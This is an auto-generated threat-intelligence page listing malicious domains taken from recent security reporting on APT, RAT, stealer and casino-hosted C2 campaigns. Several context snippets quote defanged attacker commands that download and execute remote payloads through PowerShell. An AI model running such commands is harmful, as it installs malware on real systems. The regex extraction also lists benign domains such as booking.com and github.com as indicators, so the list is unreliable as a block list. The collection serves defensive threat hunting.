Indicators of compromise
1,796 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use
| Type | Indicator | Context | Article | First seen |
|---|---|---|---|---|
| domain | asp.net | is a .NET-based implant designed to blend into Exchange and ASP.NET activity while providing command execution, proxying, socke | NightEagle Hackers Target Russian Companies Using GhostContainer Backdoor GBHackers | · 1h ago |
| domain | adtarget.com | plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an advertising domain registered in 1998. The lookalike | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | adtargett.com | ick marketing review. One delivery host hid in plain sight: adtargett[.]com differed by a single “t” from adtarget[.]com , an adverti | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | booking.com | ects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific target sites, so they stayed t | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | buking.com | ink rewriters, and redirects for typosquatted domains, like buking[.]com instead of booking[.]com ) only wake up on specific targe | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | cdnpps.us | Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside th | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | hanstrackr.com | net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) sat inside these disabled modules. On the shop, the act | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | jullyambery.net | domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older captures, what those endpoi | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | scrprime.com | to change its behavior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | sugabit.net | d turned off on this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint h | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | votetoda.com | this storefront. Several embedded domains ( sugabit[.]net , votetoda[.]com , cdnpps[.]us , and telemetry endpoint hanstrackr[.]com ) | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | youronlinesearches.com | havior. While the hardcoded domain names ( scrprime[.]com , youronlinesearches[.]com , jullyambery[.]net ) remained identical to older capture | When scanners miss the attack: how Cloudflare Client-Side Security protects storefronts Cloudflare Blog | · 11h ago |
| domain | asp.net | xtraction of cryptographic keys used by the server from the ASP.NET configuration, followed by overwriting the VIEWSTATE framew | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 15h ago |
| domain | ipapi.co | btain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, and recovery m | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 15h ago |
| domain | ipify.org | ommand Prompt, obtain the public IP address by querying api.ipify[.]org and ipapi[.]co, and disable a number of backup, database, | Three Threat Groups Target Russian Enterprises With Backdoors, Ransomware, and Wipers The Hacker News | · 15h ago |
| domain | backblazeb2.com | s using the following command: powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip C2 commun | Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH Zscaler ThreatLabz | · 15h ago |
| domain | indiatodays.org | conhost.exe --headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex] Create scheduled tasks that execute payloads at | Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH Zscaler ThreatLabz | · 15h ago |
| domain | bjssourcing.com | rs of Compromise (IoCs):- Type Indicator Description Domain bjssourcing[.]com Lookalike sender domain used in the procurement-officer p | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 16h ago |
| domain | elitechiropracticandrehab.com | crypted redirect destination Domain account-access-rc3uenqi.elitechiropracticandrehab[.]com Device-code phishing server hosted under a likely comprom | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 16h ago |
| domain | flipbookonlinevault.com | ent used as the document-sharing lure URL hxxps://chartered.flipbookonlinevault[.]com/scanna/200e61bfe54c92fb720c77c3a1661bc0/b5ea87c2ddac3aa14 | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 16h ago |
| domain | greenlightdlstribution.com | ender domain used in the procurement-officer pretext Domain greenlightdlstribution[.]com Related impersonation domain registered during the campai | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 16h ago |
| domain | voewo.com | tered during the campaign period Email address jeremyarcher@voewo[.]com Disposable address associated with registration of a rela | GhostCode Phishing Kit Bypasses Microsoft 365 MFA to Hijack Accounts in 78 Seconds Cyber Security News | · 16h ago |
| domain | managedkafka.heyhru-server.cloud.goog | f the indicators listed in Anthropic’s report was “Backend. managedkafka[.]heyhru-server[.]cloud[.]goog, the operator backend hosted on Google Cloud.” Since | The sexy AI-powered dating app scams are here The Verge · AI | · 16h ago |
| domain | verify-cloud.digital | distribution panel associated with the listed domain Domain verify-cloud.digital Domain resolving to the ClickFix distribution infrastructur | Hackers Can Rent VectraRAT for $250 a Month to Take Control of Windows PCs Cyber Security News | · 16h ago |
| domain | airuhuo.xyz | 8178b9dce62a482 Source-listed Noodle RAT sample hash Domain airuhuo.xyz Source-listed domain indicator IPv4 Address 64.118.132.233 | Hackers Use Cross-Platform Noodle RAT to Secretly Control Windows and Linux Systems Cyber Security News | · 17h ago |
| domain | shdufysuf.com | dress 64.118.132.233 Source-listed network indicator Domain shdufysuf.com Source-listed domain indicator IPv4 Address 191.223.42.34 S | Hackers Use Cross-Platform Noodle RAT to Secretly Control Windows and Linux Systems Cyber Security News | · 17h ago |
| domain | bjssourcing.com | suggests scale. eSentire linked the observed sender domain, bjssourcing[.]com, to more than 30 recently registered lookalike domains im | GhostCode Abuses Microsoft Entra Device Enrollment to Maintain Access After Token Revocation GBHackers | · 17h ago |
| domain | trsb.top | (IoCs):- Type Indicator Description Codebase family string trsb.top String referenced inside the JWR worker and used to identif | Smishing Hackers Can Watch Every Keystroke as Victims Enter Card Details and OTPs Cyber Security News | · 17h ago |
| domain | verify-cloud.digital | 53850). 86.109.75.161 ClickFix distribution panel, resolves verify-cloud.digital. 178.16.54.148 ClickFix panel serving VectraRAT and NetSupp | VectraRAT Malware-as-a-Service Lets Hackers Bypass UAC and Hijack Windows Systems GBHackers | · 17h ago |
| domain | 17dlz.cn | .154.195 Sending infrastructure IP address Sending MTA mos1.17dlz[.]cn HELO/PTR value for the sending mail transfer agent Bulk-m | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | aidenllc.com | Related lure domain in July 2026 waves Sister delivery host aidenllc[.]com Related delivery host Sister delivery host gov-xnui[.]com | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | dgdskfds.uk.cc | d38 Related sample: Tax_Notice_99674.img Sister lure domain dgdskfds[.]uk[.]cc Related lure domain in July 2026 waves Sister delivery | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | download.php | ng location Payload / landing URL hxxps://dsfgssd[.]uk[.]cc/download[.]php Download endpoint for the payload Tracking-beacon path /a | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | dsfgssd.uk.cc | cn Mailer authentication host Payload / landing URL hxxps://dsfgssd[.]uk[.]cc/ Initial payload hosting location Payload / landing URL | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | ekl1-neettr.bond | address used by a sibling sample Related certificate domain ekl1-neettr[.]bond Domain linked to the sender IP 155.94.154.195 Note: IP ad | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | gisudyawz.ink | xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving to 103.23.172.15 Sister lure title कर द | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | gov-xnui.com | t aidenllc[.]com Related delivery host Sister delivery host gov-xnui[.]com Related delivery host Sister delivery host xjxfxn[.]com R | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | hsaui.cc | Indicator Description Sender address / DKIM domain dfgfasd@hsaui[.]cc Observed sender address and DKIM domain Sending IP 155.94 | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | jfbcea.com | ost xjxfxn[.]com Related delivery host Sister delivery host jfbcea[.]com Related delivery host DGA domain cluster tzawccsw[.]xin , | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | pzisiauywa.xin | .]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving to 103.23.172.15 Sist | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | smtpman.cn | the sending mail transfer agent Bulk-mailer auth host smtp.smtpman[.]cn Mailer authentication host Payload / landing URL hxxps:// | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | tzawccsw.xin | host jfbcea[.]com Related delivery host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzi | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | xjxfxn.com | t gov-xnui[.]com Related delivery host Sister delivery host xjxfxn[.]com Related delivery host Sister delivery host jfbcea[.]com R | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | zasudtytw.xin | y host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Dom | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | zixhasda.xin | cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , gisudyawz[.]ink Domains resolving to | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | zxizusuy.xin | m Related delivery host DGA domain cluster tzawccsw[.]xin , zxizusuy[.]xin , zasudtytw[.]xin , zixhasda[.]xin , pzisiauywa[.]xin , g | PAPERMILL Hackers Abuse Signed Notepad++ to Deploy VenomRAT in Tax Audit Attacks Cyber Security News | · 18h ago |
| domain | 11168833.com | ersonating an investment platform Casino domains 80074.cc , 11168833.com Near-identical casino sites using different branding Casino | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | 11170011.com | he researchers’ comparison of lookalike pages Casino domain 11170011.com Illegal Chinese-language casino site using impersonated bra | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | 1862.cc | ently active casino-site examples Redirecting casino domain 1862.cc Casino site that fingerprinted visitors and redirected them | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | 312zym001.cc | ntical casino sites using different branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examples | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | 80074.cc | om Site impersonating an investment platform Casino domains 80074.cc , 11168833.com Near-identical casino sites using different | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | 843470.cc | different branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examples Redirecting casino dom | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | am125.cc | ites using different branding Casino domains 312zym001.cc , am125.cc , 843470.cc Recently active casino-site examples Redirectin | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | appcasino.online | site promoted through injected comment spam Redirect domain appcasino.online Domain reached through clicks on dragobet.net Scam gambling | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | asg78.com | mbling site advertising a deposit bonus Casino decoy domain asg78.com Chinese-language casino domain observed loading a suspiciou | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | cache-cdn.org | ated PeckBirdy domain used to collect connections C2 domain cache-cdn.org Previously identified PeckBirdy domain with VirusTotal dete | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | cache-mcp.com | m/layer.js Suspicious payload loaded by asg78.com C2 domain cache-mcp.com PeckBirdy command-and-control domain embedded in casino pag | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | dollycasino.com | ing 1862.cc from a Japanese IP address Scam gambling domain dollycasino.com Scam gambling site associated with complaints about withdra | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | dragobet.net | h complaints about withdrawal problems Scam gambling domain dragobet.net Scam gambling site promoted through injected comment spam R | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | githubassets.net | VirusTotal detections Possible typosquat/C2-related domain githubassets.net Historical PeckBirdy domain that may also receive accidenta | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | js.cache-mcp.com | ng a suspicious JavaScript payload Malicious JavaScript URL js.cache-mcp.com/layer.js Suspicious payload loaded by asg78.com C2 domain c | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | mcp-source.online | mmand-and-control domain embedded in casino pages C2 domain mcp-source.online WebSocket-related PeckBirdy domain used to collect connecti | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | puqxr.com | ino site using impersonated branding Investment scam domain puqxr.com Site impersonating an investment platform Casino domains 80 | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | realz.com | ambling site using misleading branding Scam gambling domain realz.com Scam gambling site advertising a deposit bonus Casino decoy | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | vip311.cc | operators can hide. Three casino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associa | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | zenplay77-x.space | casino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associated with PeckBirdy (Source – Infob | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | zzyud.com | n hide. Three casino sites from left to right, vip311[.]cc, zzyud[.]com, zenplay77-x[.]space; vip311[.]cc is associated with Peck | Hackers Are Hiding Espionage Infrastructure Inside Ordinary-Looking Casino Websites Cyber Security News | · 19h ago |
| domain | github.com | s and archives were disguised to look legitimate: https : //github[.]com/mirror-js/mirror-js/refs/heads/main/js/js-webpack.zip htt | NightEagle targets Russian companies Kaspersky Securelist | · 21h ago |
| domain | ferncore13.com | in Figure 2 retrieved a Z-shell (Zsh) script from hxxps[:]//ferncore13[.]com/curl/608e70d1338612686917ee5cd300ff7ed8e318dfd787a50257f9 | Atomic macOS (AMOS) Stealer Activity Palo Alto Unit 42 | · 21h ago |
| domain | getmacouscloud.com | ng to have installation instructions for a macOS toolkit is getmacouscloud[.]com . An example of one of the pages is shown below in Figure | Atomic macOS (AMOS) Stealer Activity Palo Alto Unit 42 | · 21h ago |
| domain | grove-89.com | m the payload returned from the initial download: hxxps[:]//grove-89[.]com/api/metrics/run?event=pasted hxxps[:]//ferncore13[.]com/2 | Atomic macOS (AMOS) Stealer Activity Palo Alto Unit 42 | · 21h ago |
| domain | 17dlz.cn | [.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addresse | PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users GBHackers | · 21h ago |
| domain | hsaui.cc | promise Type Indicator Sender address / DKIM domain dfgfasd@hsaui[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17d | PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users GBHackers | · 21h ago |
| domain | smtpman.cn | g MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addresses and domains are intentionally defanged | PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users GBHackers | · 21h ago |
| domain | 11170011.com | ity casino websites in this network. A recently active site 11170011[.]com featuring “Venetian Macao” branding, translated into Engl | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | 80074.cc | Language Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311[.]cc Decoy | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | appcasino.online | Scambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-Language Casino Domains (Type 1) 11170011 | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | cache-cdn.org | ly three. A previously identified PeckBirdy-related domain, cache-cdn[.]org, had 13 detections illustrating how visibility drops as o | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | cache-mcp.com | embedded JavaScript associated with the PeckBirdy C2 domain cache-mcp[.]com. The script registered a service worker and connected to | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | dollycasino.com | l pattern. IOCs Category Domains Scambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-Languag | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | dragobet.net | y and unworthy of investigation. If you search this domain “dragobet[.]net” on Google it quickly becomes clear that someone ran a bl | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | githubassets.net | is not automatically evidence of compromise. In particular, githubassets[.]net a PeckBirdy-associated typosquat can be reached through c | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | mcp-source.online | ervice worker and connected to another infrastructure node, mcp-source[.]online, through WebSocket communications. That layered design ma | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | puqxr.com | gal Chinese-Language Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311 | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | vip311.cc | the threat actors have refined the camouflage. One example, vip311[.]cc, presented itself as a Chinese-language KY-branded casino | China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites GBHackers | · 22h ago |
| domain | api.telegram.org | a space after Windows , used for additional payloads Domain api[.]telegram[.]org Telegram service domain that should be investigated whe | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | backblazeb2.com | e domain that should be investigated when unexpected Domain backblazeb2[.]com Cloud-storage domain identified for investigation Domain | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | iproyal.com | io Cloud-storage domain identified for investigation Domain iproyal[.]com Proxy-service domain identified for investigation Domain | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | lightningproxies.net | om Proxy-service domain identified for investigation Domain lightningproxies[.]net Proxy-service domain identified for investigation Note: I | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | storjshare.io | d object-storage domain identified for investigation Domain storjshare[.]io Cloud-storage domain identified for investigation Domain | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | vultrobjects.com | om Cloud-storage domain identified for investigation Domain vultrobjects[.]com Cloud object-storage domain identified for investigation | Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware Cyber Security News | · 22h ago |
| domain | acrobat-updater.com | n[.]online Earlier campaign extension-hosting domain Domain acrobat-updater[.]com Earlier campaign lure and payload-hosting domain Domain l | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | codecaudiog.site | rastructure associated with a related KREMLIN branch Domain codecaudiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideo | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | codecvideowin.online | udiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideowin[.]online Earlier campaign extension-hosting domain Domain acrobat- | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | connection.upgradeonline.site | 51a9b9 PowerShell extension-installer implementation Domain connection[.]upgradeonline[.]site Loader beaconing and extension-delivery infrastructure | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | cremeb.com | itily[.]workers[.]dev FrameSync campaign C2 resolver Domain cremeb[.]com QR-extension and earlier KREMLIN campaign infrastructure | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | donalurdesconfeitos.site | xtension and earlier KREMLIN campaign infrastructure Domain donalurdesconfeitos[.]site Earlier extension-delivery infrastructure Domain marialur | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | granderevolucao.store | yfans[.]net Network canary domain checked by KREMLIN Domain granderevolucao[.]store Installer payload-hosting domain Domain volmira[.]site Ex | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | graph.checkeligibitily.workers.dev | nline Exfiltration and fingerprinting infrastructure Domain graph[.]checkeligibitily[.]workers[.]dev Extension endpoint resolver Domain luizestrelhashapr[ | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
| domain | harialurdes.site | ialurdes[.]site Intermediate KREMLIN campaign domain Domain harialurdes[.]site Intermediate KREMLIN campaign domain IP address 178.92.16 | KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension Cyber Security News | · 22h ago |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.